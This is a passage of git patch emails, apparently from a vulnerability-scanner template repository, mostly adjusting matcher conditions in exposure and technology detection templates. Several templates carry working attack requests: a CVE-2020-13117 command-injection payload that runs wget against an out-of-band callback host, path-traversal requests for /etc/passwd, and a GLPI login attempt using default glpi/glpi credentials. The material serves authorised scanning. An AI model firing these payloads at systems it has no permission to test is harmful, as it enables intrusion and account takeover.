e96b8ca3388bf1bf49ea6d4b7d7f7fb4ece070c9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:46:26 +0530 Subject: [PATCH 1036/4083] Update exposures/files/php-user-ini-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/php-user-ini-disclosure.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/files/php-user-ini-disclosure.yaml b/exposures/files/php-user-ini-disclosure.yaml index 882a285d4a..8994cedb7b 100644 --- a/exposures/files/php-user-ini-disclosure.yaml +++ b/exposures/files/php-user-ini-disclosure.yaml @@ -24,6 +24,8 @@ requests: - "oci8" - "agent" part: body + condition: and + - type: status status: - 200 From cb73dc4630d1403491dd54f1b5bf0a37ec1b58ac Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:46:32 +0530 Subject: [PATCH 1037/4083] Update exposures/files/putty-private-key-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/putty-private-key-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/putty-private-key-disclosure.yaml b/exposures/files/putty-private-key-disclosure.yaml index 7c6cb29f79..ae8905a983 100644 --- a/exposures/files/putty-private-key-disclosure.yaml +++ b/exposures/files/putty-private-key-disclosure.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/my.ppk" + matchers-condition: and matchers: - type: word From bdc15afe1bfad61dca74e375ca8ed38aedfc074f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:46:40 +0530 Subject: [PATCH 1038/4083] Update exposures/files/putty-private-key-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/putty-private-key-disclosure.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/files/putty-private-key-disclosure.yaml b/exposures/files/putty-private-key-disclosure.yaml index ae8905a983..1dc255d138 100644 --- a/exposures/files/putty-private-key-disclosure.yaml +++ b/exposures/files/putty-private-key-disclosure.yaml @@ -19,6 +19,8 @@ requests: - "PuTTY-User-Key-File" - "Encryption:" part: body + condition: and + - type: status status: - 200 From f21894a4319fbfd49aa333b2288d4fd1b950c50f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:46:46 +0530 Subject: [PATCH 1039/4083] Update exposures/files/pyproject-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/pyproject-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/pyproject-disclosure.yaml b/exposures/files/pyproject-disclosure.yaml index 11223e694f..67fc12e1aa 100644 --- a/exposures/files/pyproject-disclosure.yaml +++ b/exposures/files/pyproject-disclosure.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/pyproject.toml" + matchers-condition: and matchers: - type: word From fd918ee65c3b4cfe96c11c3917939c4d1d5f7bff Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:46:52 +0530 Subject: [PATCH 1040/4083] Update exposures/files/pyproject-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/pyproject-disclosure.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/files/pyproject-disclosure.yaml b/exposures/files/pyproject-disclosure.yaml index 67fc12e1aa..d1d4399adf 100644 --- a/exposures/files/pyproject-disclosure.yaml +++ b/exposures/files/pyproject-disclosure.yaml @@ -19,6 +19,8 @@ requests: - "[build-system]" - "[tool.poetry]" part: body + condition: and + - type: status status: - 200 From fd2df6ca5998b78f7d0202da80d99f0ea37a7682 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:47:00 +0530 Subject: [PATCH 1041/4083] Update exposures/files/snyk-ignore-file-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/snyk-ignore-file-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/snyk-ignore-file-disclosure.yaml b/exposures/files/snyk-ignore-file-disclosure.yaml index e050af3142..e05cdeba5d 100644 --- a/exposures/files/snyk-ignore-file-disclosure.yaml +++ b/exposures/files/snyk-ignore-file-disclosure.yaml @@ -15,7 +15,7 @@ requests: matchers: - type: word words: - - '# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.' + - "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities." part: body - type: status status: From 7b5af09772b2bf42b0860edd03532e27268ccdaf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:47:06 +0530 Subject: [PATCH 1042/4083] Update exposures/files/snyk-ignore-file-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/snyk-ignore-file-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/snyk-ignore-file-disclosure.yaml b/exposures/files/snyk-ignore-file-disclosure.yaml index e05cdeba5d..e64f185bbc 100644 --- a/exposures/files/snyk-ignore-file-disclosure.yaml +++ b/exposures/files/snyk-ignore-file-disclosure.yaml @@ -17,6 +17,7 @@ requests: words: - "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities." part: body + - type: status status: - 200 From 6754ef5dd2122603f700b9919a1950ab27acb843 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:47:16 +0530 Subject: [PATCH 1043/4083] Update exposures/files/thumbs-db-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/thumbs-db-disclosure.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/exposures/files/thumbs-db-disclosure.yaml b/exposures/files/thumbs-db-disclosure.yaml index af2bca3ae2..b5ee7b65d9 100644 --- a/exposures/files/thumbs-db-disclosure.yaml +++ b/exposures/files/thumbs-db-disclosure.yaml @@ -13,10 +13,11 @@ requests: - "{{BaseURL}}/Thumbs.db" matchers-condition: and matchers: - - type: regex - regex: - - '\\xD0\\xCF\\x11\\xE0\\xA1\\xB1\\x1A\\xE1' + - type: binary + binary: + - 'D0CF11E0A1B11AE1' part: body + - type: status status: - 200 From 1671b074c0478616a73ed2f7fbef561befd4de52 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:47:22 +0530 Subject: [PATCH 1044/4083] Update exposures/logs/roundcube-log-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/logs/roundcube-log-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/logs/roundcube-log-disclosure.yaml b/exposures/logs/roundcube-log-disclosure.yaml index 33c1b9bb29..2416620b57 100644 --- a/exposures/logs/roundcube-log-disclosure.yaml +++ b/exposures/logs/roundcube-log-disclosure.yaml @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}/roundcube/logs/sendmail" - "{{BaseURL}}/roundcube/logs/errors.log" + matchers-condition: and matchers: - type: word From 4d7152287d1e30a0d5319d9012f94923617bbf7a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 23 Jul 2021 14:58:21 +0530 Subject: [PATCH 1045/4083] Update adobe-component-login.yaml --- exposed-panels/adobe-component-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/adobe-component-login.yaml b/exposed-panels/adobe-component-login.yaml index 99bde2adb4..b00b2c9b7f 100644 --- a/exposed-panels/adobe-component-login.yaml +++ b/exposed-panels/adobe-component-login.yaml @@ -12,7 +12,7 @@ requests: path: - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - '{{BaseURL}}/cfide/componentutils/login.cfm' - + matchers-condition: and matchers: - type: word From f60a9ed8916b07eedc6281024c746f0cec3660d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 23 Jul 2021 15:06:51 +0530 Subject: [PATCH 1046/4083] Update CVE-2020-13117.yaml --- cves/2020/CVE-2020-13117.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml index 8d293cf617..41bc0e3875 100644 --- a/cves/2020/CVE-2020-13117.yaml +++ b/cves/2020/CVE-2020-13117.yaml @@ -24,10 +24,8 @@ requests: Connection: close newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - From 1dd4e3c846676f5cf40f877301264e701eb15e16 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 23 Jul 2021 15:15:23 +0530 Subject: [PATCH 1047/4083] Update visual-tools-dvr-rce.yaml --- vulnerabilities/other/visual-tools-dvr-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/visual-tools-dvr-rce.yaml b/vulnerabilities/other/visual-tools-dvr-rce.yaml index 39f9c70291..13f405a3e5 100644 --- a/vulnerabilities/other/visual-tools-dvr-rce.yaml +++ b/vulnerabilities/other/visual-tools-dvr-rce.yaml @@ -21,7 +21,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:[x*]:0:0:" - type: status status: From 834d6b8f2ae19a0da671e89699d5b58806c21841 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 17:49:32 +0530 Subject: [PATCH 1048/4083] Update dockerfile-hidden-disclosure.yaml --- exposures/configs/dockerfile-hidden-disclosure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/dockerfile-hidden-disclosure.yaml b/exposures/configs/dockerfile-hidden-disclosure.yaml index 194043946a..c1b9eb87b4 100644 --- a/exposures/configs/dockerfile-hidden-disclosure.yaml +++ b/exposures/configs/dockerfile-hidden-disclosure.yaml @@ -17,9 +17,9 @@ requests: matchers: - type: regex regex: - - '^(?:FROM(?:CACHE)?|RUN|ADD|WORKDIR|ENV|EXPOSE|\\#)\\s+[ -~]+' + - '^(?:FROM(?:CACHE)?|RUN|ADD|WORKDIR|ENV|EXPOSE|\#)\s+[ -~]+' part: body - + - type: status status: - 200 From 5461a082bd60339348c1b5a54085ab712d8862d5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 17:53:56 +0530 Subject: [PATCH 1049/4083] Update default-logins/apache/apache-superset-default-credentials.yaml Co-authored-by: Toufik Airane --- default-logins/apache/apache-superset-default-credentials.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/default-logins/apache/apache-superset-default-credentials.yaml b/default-logins/apache/apache-superset-default-credentials.yaml index a09c89feb5..b3d4f19c2b 100644 --- a/default-logins/apache/apache-superset-default-credentials.yaml +++ b/default-logins/apache/apache-superset-default-credentials.yaml @@ -17,7 +17,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "Redirecting..." From 1409b295bdd81a7b34c5c7ada28c6d2b662c1d04 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 17:54:03 +0530 Subject: [PATCH 1050/4083] Update default-logins/apache/apache-superset-default-credentials.yaml Co-authored-by: Toufik Airane --- default-logins/apache/apache-superset-default-credentials.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/default-logins/apache/apache-superset-default-credentials.yaml b/default-logins/apache/apache-superset-default-credentials.yaml index b3d4f19c2b..96d4d28195 100644 --- a/default-logins/apache/apache-superset-default-credentials.yaml +++ b/default-logins/apache/apache-superset-default-credentials.yaml @@ -22,6 +22,7 @@ requests: - "Redirecting..." - "/" part: body + condition: and - type: status status: From 62c2693d3402ab0e1b5a0c6afb6ec5bc157676dd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 17:54:17 +0530 Subject: [PATCH 1051/4083] Update exposures/configs/appsec-yml-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/appsec-yml-disclosure.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposures/configs/appsec-yml-disclosure.yaml b/exposures/configs/appsec-yml-disclosure.yaml index f8f1386fa5..ea5609f374 100644 --- a/exposures/configs/appsec-yml-disclosure.yaml +++ b/exposures/configs/appsec-yml-disclosure.yaml @@ -20,7 +20,6 @@ requests: - "version:" - "os:" - "files:" - - "source:" part: body condition: and - type: word From 3528cd7beffab331a6dcd759d54f6aa8a9220633 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 17:54:27 +0530 Subject: [PATCH 1052/4083] Update exposures/configs/github-workflows-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/github-workflows-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml index 9fbd439407..b27d112d06 100644 --- a/exposures/configs/github-workflows-disclosure.yaml +++ b/exposures/configs/github-workflows-disclosure.yaml @@ -31,6 +31,7 @@ requests: - "{{BaseURL}}/.github/workflows/pr.yml" - "{{BaseURL}}/.github/workflows/automerge.yml" - "{{BaseURL}}/.github/workflows/docker.yml" + matchers-condition: and matchers: - type: regex From 1d9979fead9133ca4390162b9711b10faa373a69 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 17:54:36 +0530 Subject: [PATCH 1053/4083] Update exposures/configs/hp-ilo-serial-key-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/hp-ilo-serial-key-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/hp-ilo-serial-key-disclosure.yaml b/exposures/configs/hp-ilo-serial-key-disclosure.yaml index b77b8a2249..6122a9e385 100644 --- a/exposures/configs/hp-ilo-serial-key-disclosure.yaml +++ b/exposures/configs/hp-ilo-serial-key-disclosure.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/xmldata?item=CpqKey" + matchers-condition: and matchers: - type: word From a80df3bdb45f03063f7ecb3351a3dbb485e0645d Mon Sep 17 00:00:00 2001 From: Andy Svintsitsky Date: Fri, 23 Jul 2021 09:20:16 -0400 Subject: [PATCH 1055/4083] Add GLPI default credentials check template --- .../glpi/glpi-default-credential.yaml | 75 +++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 default-logins/glpi/glpi-default-credential.yaml diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml new file mode 100644 index 0000000000..82dce49c09 --- /dev/null +++ b/default-logins/glpi/glpi-default-credential.yaml @@ -0,0 +1,75 @@ +id: glpi-default-credentials +info: + name: GLPI Default Credentials Check + author: andysvints + severity: high + tags: glpi,default-login + description: GLPI is an incredible ITSM software tool that helps you plan and manage IT changes in an easy way, solve problems efficiently when they emerge and allow you to gain legitimate control over your company’s IT budget, and expenses. + reference: https://glpi-project.org/ + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Upgrade-Insecure-Requests: 1 + Connection: keep-alive + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 + + - | + POST /front/login.php HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Length: 179 + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 + + {{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}} + + cookie-reuse: true + redirects: true + + extractors: + - type: regex + name: token + part: body + internal: true + group: 1 + regex: + - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\"" + + - type: regex + name: name + part: body + internal: true + group: 1 + regex: + - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" + + - type: regex + name: password + part: body + internal: true + group: 1 + regex: + - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" + + matchers-condition: and + matchers: + - type: word + words: + - 'GLPI - Standard Interface' + - type: status + status: + - 302 + - 200 From 414b3a50def4190c0403ea8a7a94d1340601505c Mon Sep 17 00:00:00 2001 From: Andy Svintsitsky Date: Fri, 23 Jul 2021 09:44:45 -0400 Subject: [PATCH 1056/4083] Update template subscription --- default-logins/glpi/glpi-default-credential.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml index 82dce49c09..5abebc5612 100644 --- a/default-logins/glpi/glpi-default-credential.yaml +++ b/default-logins/glpi/glpi-default-credential.yaml @@ -4,7 +4,7 @@ info: author: andysvints severity: high tags: glpi,default-login - description: GLPI is an incredible ITSM software tool that helps you plan and manage IT changes in an easy way, solve problems efficiently when they emerge and allow you to gain legitimate control over your company’s IT budget, and expenses. + description: GLPI is an ITSM software tool that helps you plan and manage IT changes. Checking is default super admin account(glpi/glpi) is enabled. reference: https://glpi-project.org/ requests: From 2dfa3d2e82516a566e367b15720c073674827ed8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 23 Jul 2021 20:46:49 +0530 Subject: [PATCH 1057/4083] Update visual-tools-dvr-rce.yaml --- vulnerabilities/other/visual-tools-dvr-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/visual-tools-dvr-rce.yaml b/vulnerabilities/other/visual-tools-dvr-rce.yaml index 13f405a3e5..39f9c70291 100644 --- a/vulnerabilities/other/visual-tools-dvr-rce.yaml +++ b/vulnerabilities/other/visual-tools-dvr-rce.yaml @@ -21,7 +21,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0" - type: status status: From 3ebd9f060704fe89432b8c44c85c70e001afec06 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 23 Jul 2021 22:46:55 +0530 Subject: [PATCH 1058/4083] misc updates --- technologies/openam-detection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml index db7dd418c2..fbb240676d 100644 --- a/technologies/openam-detection.yaml +++ b/technologies/openam-detection.yaml @@ -2,7 +2,7 @@ id: openam-detection info: name: Detect OpenAM and OpenSSO - author: philippedelteil,melbadry9,xelkomy + author: philippedelteil severity: info requests: From 654e238eecdfa212b92e3038e679185d5617ebe1 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 23 Jul 2021 13:24:22 -0400 Subject: [PATCH 1059/4083] Create adobe-coldfusion-detector-error.yaml --- .../adobe-coldfusion-detector-error.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/adobe-coldfusion-detector-error.yaml diff --git a/technologies/adobe-coldfusion-detector-error.yaml b/technologies/adobe-coldfusion-detector-error.yaml new file mode 100644 index 0000000000..6586e80b11 --- /dev/null +++ b/technologies/adobe-coldfusion-detector-error.yaml @@ -0,0 +1,23 @@ +id: adobe-coldfusion-detector-error + +info: + name: Adobe ColdFusion Detector + author: philippedelteil + severity: info + description: With this template we can detect a running ColdFusion instance due to an error page. + reference: https://twitter.com/PhilippeDelteil/status/1418622775829348358 + tags: adobe,coldfusion +requests: + - method: GET + path: + - "{{BaseURL}}/_something_.cfm" + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ColdFusion documentation' + - type: status + part: header + status: + - 404 From 2f719a9f14a72f8df2cf4db5ead8c08618f7f02c Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 23 Jul 2021 23:25:45 +0530 Subject: [PATCH 1060/4083] Update adobe-coldfusion-detector-error.yaml --- technologies/adobe-coldfusion-detector-error.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/technologies/adobe-coldfusion-detector-error.yaml b/technologies/adobe-coldfusion-detector-error.yaml index 6586e80b11..6b57009949 100644 --- a/technologies/adobe-coldfusion-detector-error.yaml +++ b/technologies/adobe-coldfusion-detector-error.yaml @@ -1,12 +1,13 @@ id: adobe-coldfusion-detector-error info: - name: Adobe ColdFusion Detector + name: Adobe ColdFusion Detector author: philippedelteil severity: info description: With this template we can detect a running ColdFusion instance due to an error page. reference: https://twitter.com/PhilippeDelteil/status/1418622775829348358 tags: adobe,coldfusion + requests: - method: GET path: @@ -17,7 +18,8 @@ requests: part: body words: - 'ColdFusion documentation' + - type: status part: header status: - - 404 + - 404 \ No newline at end of file From 1a60af30ade17f15e1adc8e0d244d98075c87def Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 23 Jul 2021 23:35:58 +0530 Subject: [PATCH 1061/4083] Update adobe-coldfusion-detector-error.yaml --- technologies/adobe-coldfusion-detector-error.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/adobe-coldfusion-detector-error.yaml b/technologies/adobe-coldfusion-detector-error.yaml index 6b57009949..ef5d2b03b2 100644 --- a/technologies/adobe-coldfusion-detector-error.yaml +++ b/technologies/adobe-coldfusion-detector-error.yaml @@ -12,6 +12,7 @@ requests: - method: GET path: - "{{BaseURL}}/_something_.cfm" + matchers-condition: and matchers: - type: word @@ -20,6 +21,5 @@ requests: - 'ColdFusion documentation' - type: status - part: header status: - - 404 \ No newline at end of file + - 404 From 763591bc97e0e3e5398116b88d589186ee03c4b7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 00:12:28 +0530 Subject: [PATCH 1062/4083] lint fixes --- exposures/configs/appsec-yml-disclosure.yaml | 10 ++++++---- exposures/configs/dockerfile-hidden-disclosure.yaml | 4 ++-- 2 files changed, 8 insertions(+), 6 deletions(-) diff --git a/exposures/configs/appsec-yml-disclosure.yaml b/exposures/configs/appsec-yml-disclosure.yaml index ea5609f374..8276c7880a 100644 --- a/exposures/configs/appsec-yml-disclosure.yaml +++ b/exposures/configs/appsec-yml-disclosure.yaml @@ -22,10 +22,12 @@ requests: - "files:" part: body condition: and - - type: word - part: header - words: - - application/yaml + + - type: word + part: header + words: + - application/yaml + - type: status status: - 200 diff --git a/exposures/configs/dockerfile-hidden-disclosure.yaml b/exposures/configs/dockerfile-hidden-disclosure.yaml index c1b9eb87b4..e51b07e047 100644 --- a/exposures/configs/dockerfile-hidden-disclosure.yaml +++ b/exposures/configs/dockerfile-hidden-disclosure.yaml @@ -19,7 +19,7 @@ requests: regex: - '^(?:FROM(?:CACHE)?|RUN|ADD|WORKDIR|ENV|EXPOSE|\#)\s+[ -~]+' part: body - + - type: status status: - - 200 + - 200 \ No newline at end of file From fccc31717a3aff1b247b7656d10ad6d9245e2004 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 24 Jul 2021 00:16:13 +0530 Subject: [PATCH 1063/4083] Update exposures/configs/github-workflows-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/github-workflows-disclosure.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml index b27d112d06..efc5febd71 100644 --- a/exposures/configs/github-workflows-disclosure.yaml +++ b/exposures/configs/github-workflows-disclosure.yaml @@ -41,6 +41,8 @@ requests: - "(?m)^\\s*\"?steps\"?:" - "(?m)^\\s*- \"?uses\"?:" part: body + condition: and + - type: word words: - "Content-Type: text/html" From 2dbeb70480c800309e29f8f1855e28cc626492e6 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 24 Jul 2021 00:24:11 +0530 Subject: [PATCH 1064/4083] Update exposures/configs/github-workflows-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/github-workflows-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml index efc5febd71..692b5588da 100644 --- a/exposures/configs/github-workflows-disclosure.yaml +++ b/exposures/configs/github-workflows-disclosure.yaml @@ -47,6 +47,7 @@ requests: words: - "Content-Type: text/html" part: header + - type: status status: - 200 From b0b737e0ebc1e1adbe5edad1dc7c70c856756c19 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 24 Jul 2021 00:24:26 +0530 Subject: [PATCH 1065/4083] Update exposures/configs/hp-ilo-serial-key-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/hp-ilo-serial-key-disclosure.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/configs/hp-ilo-serial-key-disclosure.yaml b/exposures/configs/hp-ilo-serial-key-disclosure.yaml index 6122a9e385..389c867695 100644 --- a/exposures/configs/hp-ilo-serial-key-disclosure.yaml +++ b/exposures/configs/hp-ilo-serial-key-disclosure.yaml @@ -20,6 +20,8 @@ requests: - "LNAME" - "KEY" part: body + condition: and + - type: word words: - "Content-Type: text/html" From 1909e3f628613cefcb3baf8f8e225e1e00bec84b Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 24 Jul 2021 00:24:37 +0530 Subject: [PATCH 1066/4083] Update vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml Co-authored-by: Toufik Airane --- vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index 31c1ab53cf..56b611097c 100644 --- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -20,6 +20,8 @@ requests: - "root:" - "app.listen" part: body + condition: or + - type: status status: - 200 From 5f4127cdaf6c5372f09b712bdc52900d01fc4eeb Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 24 Jul 2021 00:24:45 +0530 Subject: [PATCH 1067/4083] Update exposures/files/ruby-on-rails-secret-token-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/ruby-on-rails-secret-token-disclosure.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/files/ruby-on-rails-secret-token-disclosure.yaml b/exposures/files/ruby-on-rails-secret-token-disclosure.yaml index 8748d50051..1e68f41bd6 100644 --- a/exposures/files/ruby-on-rails-secret-token-disclosure.yaml +++ b/exposures/files/ruby-on-rails-secret-token-disclosure.yaml @@ -18,6 +18,8 @@ requests: - "secret_key_base =" - "config.secret_token =" part: body + condition: and + - type: status status: - 200 From b346584002c78d2830156936a862cfdb05dfdb4c Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 24 Jul 2021 00:25:13 +0530 Subject: [PATCH 1068/4083] Update vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml Co-authored-by: Toufik Airane --- vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index 56b611097c..8b9b46a81b 100644 --- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -13,6 +13,7 @@ requests: - "{{BaseURL}}//////../../../etc/passwd" - "{{BaseURL}}/static//////../../../../etc/passwd" - "{{BaseURL}}///../app.js" + matchers-condition: and matchers: - type: word From 840d3ee4e35187eb1f6b2bee7e7af96ac971b29f Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 00:26:56 +0530 Subject: [PATCH 1069/4083] Update github-workflows-disclosure.yaml removing content type check as this might miss valid results with no content type in response --- exposures/configs/github-workflows-disclosure.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml index 692b5588da..ae6e4bf5fc 100644 --- a/exposures/configs/github-workflows-disclosure.yaml +++ b/exposures/configs/github-workflows-disclosure.yaml @@ -43,11 +43,6 @@ requests: part: body condition: and - - type: word - words: - - "Content-Type: text/html" - part: header - - type: status status: - 200 From 1f4f8ce3325ab88ed00c5ed0c7339853da7de658 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 00:30:53 +0530 Subject: [PATCH 1070/4083] matcher update --- .../configs/git-credentials-disclosure.yaml | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/exposures/configs/git-credentials-disclosure.yaml b/exposures/configs/git-credentials-disclosure.yaml index b0bf844872..c6a97b6f21 100644 --- a/exposures/configs/git-credentials-disclosure.yaml +++ b/exposures/configs/git-credentials-disclosure.yaml @@ -14,14 +14,19 @@ requests: matchers-condition: and matchers: - - type: regex - regex: - - 